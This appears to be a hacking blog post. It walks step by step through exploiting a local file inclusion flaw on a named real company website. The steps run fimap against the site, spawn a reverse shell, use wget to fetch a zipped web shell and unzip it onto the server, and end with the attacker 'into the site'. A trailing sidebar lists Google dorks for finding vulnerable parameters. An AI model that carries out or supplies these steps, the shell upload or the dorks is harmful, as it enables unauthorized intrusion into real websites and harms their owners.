Local File Inclusion Example 3






step by step LFI:

step 1:
             the vulnurable link is
             http://www.egenerationglobal.com/index.php?page=offshore_software_development.php
        step 2:
             scan it with fimap
           
    disktop/fi>fimap.py -u "http://www.egenerationglobal.com/index.php?page=offshore_software_development.php"
step 3:
    exploit with fimap

    disktop/fi>fimap.py -x "http://www.egenerationglobal.com/index.php?page=offshore_software_development.php"
  step 4:
    now it will ask to choose a domain we wanna exploit juz choose a number

step 5:
    it will ask for the two available attack so we need to choose any one
    Spawn Shell            
             Create reverse shell...
        step 6:
    now make a directory using MKDIR command

  step 7:
      now change the path to the directory
step 8:
 `  
    now get the shell using WGET command from any website which we have uploaded in our
    we have shell in
    http://www.egenerationglobal.com/Mr12/india.zip
         
    mr12>WGET http://www.egenerationglobal.com/Mr12/india.zip..... just press enter
             now the shell is being copied which is present in zip file
        step 9:
    now we have to unzip the shell
    simply use the command UNZIP
 
             MR12>unzip india.zip

        step 10:
                websitename.com/directoryname/filename.php
                http://www.egenerationglobal.com/Mr12/india.php



               hurayyyyyyyyyy ur into the site

Comments

Post a Comment

Popular posts from this blog

Google Dorks For Parameters

Image
inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategor...
Read more